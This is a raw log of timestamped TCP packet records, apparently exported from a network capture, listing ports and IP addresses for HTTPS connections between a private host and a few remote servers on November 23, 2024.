                                                                                                                                                                                  Nov 23, 2024 19:52:51.115355968 CET49773443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:51.115367889 CET4434977313.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:51.115379095 CET49773443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:51.115385056 CET4434977313.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:51.118433952 CET49778443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:51.118478060 CET4434977813.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:51.118582964 CET49778443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:51.118748903 CET49778443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:51.118761063 CET4434977813.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:51.484457970 CET4434977413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:51.484950066 CET49774443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:51.484966993 CET4434977413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:51.485467911 CET49774443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:51.485477924 CET4434977413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:51.852091074 CET4434977513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:51.852999926 CET49775443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:51.853013039 CET4434977513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:51.853492975 CET49775443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:51.853498936 CET4434977513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:51.943063021 CET4434977413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:51.943124056 CET4434977413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:51.943217993 CET49774443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:51.956892967 CET49774443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:51.956907988 CET4434977413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:51.956943035 CET49774443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:51.956949949 CET4434977413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:51.969542980 CET49779443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:51.969583988 CET4434977913.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:51.969656944 CET49779443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:51.969871044 CET49779443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:51.969882965 CET4434977913.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:52.590049028 CET4434977613.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:52.596440077 CET49776443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:52.596455097 CET4434977613.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:52.603394032 CET49776443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:52.603399992 CET4434977613.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:52.784809113 CET4434977713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:52.796478987 CET49777443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:52.796504021 CET4434977713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:52.800471067 CET49777443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:52.800488949 CET4434977713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:52.913988113 CET4434977813.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:52.923223019 CET49778443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:52.923252106 CET4434977813.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:52.923680067 CET49778443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:52.923685074 CET4434977813.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:53.044152975 CET4434977613.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:53.044222116 CET4434977613.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:53.044294119 CET49776443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:53.064460993 CET4434977513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:53.064546108 CET4434977513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:53.064626932 CET49775443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:53.183741093 CET49776443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:53.183763981 CET4434977613.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:53.183770895 CET49776443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:53.183778048 CET4434977613.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:53.184811115 CET49775443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:53.184848070 CET4434977513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:53.184856892 CET49775443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:53.184864044 CET4434977513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:53.237622976 CET49780443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:53.237652063 CET4434978013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:53.237709999 CET49780443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:53.261575937 CET49780443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:53.261596918 CET4434978013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:53.263900042 CET49781443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:53.263931990 CET4434978113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:53.264023066 CET49781443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:53.264214993 CET49781443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:53.264230013 CET4434978113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:53.403630972 CET4434977713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:53.403814077 CET4434977713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:53.403873920 CET49777443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:53.416543007 CET49777443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:53.416559935 CET4434977713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:53.416569948 CET49777443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:53.416575909 CET4434977713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:53.427090883 CET49782443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:53.427128077 CET4434978213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:53.427196026 CET49782443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:53.435242891 CET49782443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:53.435256004 CET4434978213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:53.520831108 CET4434977813.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:53.520886898 CET4434977813.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:53.520948887 CET49778443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:53.522623062 CET49778443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:53.522644043 CET4434977813.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:53.522651911 CET49778443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:53.522659063 CET4434977813.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:53.529196024 CET49783443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:53.529227972 CET4434978313.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:53.529345036 CET49783443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:53.529694080 CET49783443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:53.529706955 CET4434978313.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:53.846163988 CET4434977913.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:53.846618891 CET49779443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:53.846649885 CET4434977913.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:53.847070932 CET49779443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:53.847078085 CET4434977913.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:54.452167034 CET4434977913.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:54.452352047 CET4434977913.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:54.452414036 CET49779443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:54.454094887 CET49779443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:54.454108953 CET4434977913.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:54.454118013 CET49779443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:54.454123020 CET4434977913.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:54.462296009 CET49784443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:54.462343931 CET4434978413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:54.462405920 CET49784443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:54.462852001 CET49784443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:54.462866068 CET4434978413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:55.154113054 CET4434978213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:55.182573080 CET4434978013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:55.194045067 CET49782443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:55.205890894 CET4434978113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:55.212188005 CET49782443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:55.212204933 CET4434978213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:55.212641954 CET49782443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:55.212646008 CET4434978213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:55.219316959 CET49780443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:55.219326973 CET4434978013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:55.219741106 CET49780443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:55.219746113 CET4434978013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:55.222301960 CET49781443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:55.222320080 CET4434978113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:55.222856998 CET49781443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:55.222865105 CET4434978113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:55.336138964 CET4434978313.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:55.380949974 CET49783443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:55.524825096 CET49783443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:55.524852037 CET4434978313.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:55.525402069 CET49783443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:55.525408983 CET4434978313.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:55.722956896 CET4434978213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:55.723125935 CET4434978213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:55.723177910 CET49782443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:55.736669064 CET49782443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:55.736690998 CET4434978213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:55.736702919 CET49782443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:55.736709118 CET4434978213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:55.754751921 CET4434978013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:55.754823923 CET4434978013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:55.754869938 CET49780443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:55.767144918 CET4434978113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:55.767343044 CET4434978113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:55.767401934 CET49781443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:55.875680923 CET4434978313.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:55.875849009 CET4434978313.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:55.875897884 CET49783443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:55.924990892 CET49780443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:55.925023079 CET4434978013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:55.925035000 CET49780443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:55.925040007 CET4434978013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:55.927268982 CET49781443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:55.927290916 CET4434978113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:55.927305937 CET49781443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:55.927321911 CET4434978113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:56.094480991 CET49783443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:56.094506025 CET4434978313.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:56.094558954 CET49783443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:56.094566107 CET4434978313.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:56.289834976 CET49794443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:56.289875984 CET4434979413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:56.289928913 CET49794443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:56.292258024 CET49795443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:56.292273998 CET4434979513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:56.292331934 CET49795443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:56.293114901 CET49794443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:56.293128014 CET4434979413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:56.295098066 CET49795443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:56.295110941 CET4434979513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:56.300971985 CET49796443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:56.300988913 CET4434979613.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:56.301038027 CET49796443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:56.301369905 CET49796443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:56.301386118 CET4434979613.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:56.305450916 CET49797443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:56.305468082 CET4434979713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:56.305531979 CET49797443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:56.305747032 CET49797443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:56.305763006 CET4434979713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:56.354471922 CET4434978413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:56.359265089 CET49784443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:56.359286070 CET4434978413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:56.359713078 CET49784443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:56.359719992 CET4434978413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:56.860686064 CET4434978413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:56.860742092 CET4434978413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:56.860799074 CET49784443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:56.861015081 CET49784443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:56.861030102 CET4434978413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:56.861044884 CET49784443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:56.861052036 CET4434978413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:56.863959074 CET49800443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:56.863984108 CET4434980013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:56.864052057 CET49800443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:56.864216089 CET49800443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:56.864228010 CET4434980013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:58.061904907 CET4434979413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:58.065686941 CET49794443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:58.065710068 CET4434979413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:58.066185951 CET49794443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:58.066190958 CET4434979413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:58.215723991 CET4434979713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:58.231543064 CET49797443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:58.231559038 CET4434979713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:58.232140064 CET49797443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:58.232144117 CET4434979713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:58.236160040 CET4434979513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:58.237577915 CET49795443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:58.237593889 CET4434979513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:58.238415956 CET49795443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:58.238420963 CET4434979513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:58.240655899 CET4434979613.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:58.244456053 CET49796443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:58.244479895 CET4434979613.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:58.244916916 CET49796443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:58.244920969 CET4434979613.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:58.680896997 CET4434979413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:58.681037903 CET4434979413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:58.681086063 CET49794443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:58.688608885 CET4434980013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:58.700881958 CET49794443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:58.700894117 CET4434979413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:58.702985048 CET49800443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:58.703000069 CET4434980013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:58.703761101 CET49800443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:58.703766108 CET4434980013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:58.768001080 CET4434979713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:58.768084049 CET4434979713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:58.768225908 CET49797443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:58.891547918 CET49797443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:58.891556978 CET4434979713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:58.891602993 CET49797443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:58.891608953 CET4434979713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:58.903465986 CET49804443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:58.903512955 CET4434980413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:58.903686047 CET49804443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:58.904894114 CET49805443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:58.904915094 CET4434980513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:58.904964924 CET49805443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:58.905546904 CET49804443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:58.905560970 CET4434980413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:58.906131029 CET49805443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:58.906145096 CET4434980513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:59.016146898 CET4434979513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:59.016379118 CET4434979513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:59.016383886 CET4434979613.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:59.016429901 CET49795443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:59.016498089 CET49795443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:59.016505003 CET4434979513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:59.016515017 CET49795443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:59.016520023 CET4434979513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:59.017030954 CET4434979613.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:59.017178059 CET49796443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:59.017322063 CET49796443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:59.017322063 CET49796443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:59.017340899 CET4434979613.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:59.017355919 CET4434979613.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:59.019617081 CET49807443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:59.019629955 CET4434980713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:59.019726038 CET49807443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:59.020106077 CET49808443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:59.020123005 CET4434980813.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:59.020158052 CET49807443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:59.020170927 CET4434980713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:59.020179033 CET49808443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:59.020257950 CET49808443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:59.020270109 CET4434980813.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:59.281984091 CET4434980013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:59.282188892 CET4434980013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:59.282301903 CET49800443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:59.282541990 CET49800443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:59.282550097 CET4434980013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:59.286221027 CET49809443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:59.286233902 CET4434980913.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:59.286295891 CET49809443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:59.286492109 CET49809443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:52:59.286504984 CET4434980913.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:59.700623035 CET4976080192.168.2.7185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 19:52:59.965404034 CET49810443192.168.2.7172.217.21.36
                                                                                                                                                                                  Nov 23, 2024 19:52:59.965423107 CET44349810172.217.21.36192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:52:59.965634108 CET49810443192.168.2.7172.217.21.36
                                                                                                                                                                                  Nov 23, 2024 19:52:59.965910912 CET49810443192.168.2.7172.217.21.36
                                                                                                                                                                                  Nov 23, 2024 19:52:59.965924978 CET44349810172.217.21.36192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:00.855166912 CET49812443192.168.2.72.18.109.164
                                                                                                                                                                                  Nov 23, 2024 19:53:00.855185986 CET443498122.18.109.164192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:00.855269909 CET49812443192.168.2.72.18.109.164
                                                                                                                                                                                  Nov 23, 2024 19:53:00.856790066 CET49812443192.168.2.72.18.109.164
                                                                                                                                                                                  Nov 23, 2024 19:53:00.856805086 CET443498122.18.109.164192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:00.873459101 CET4434980413.107.246.63192.168.2.7
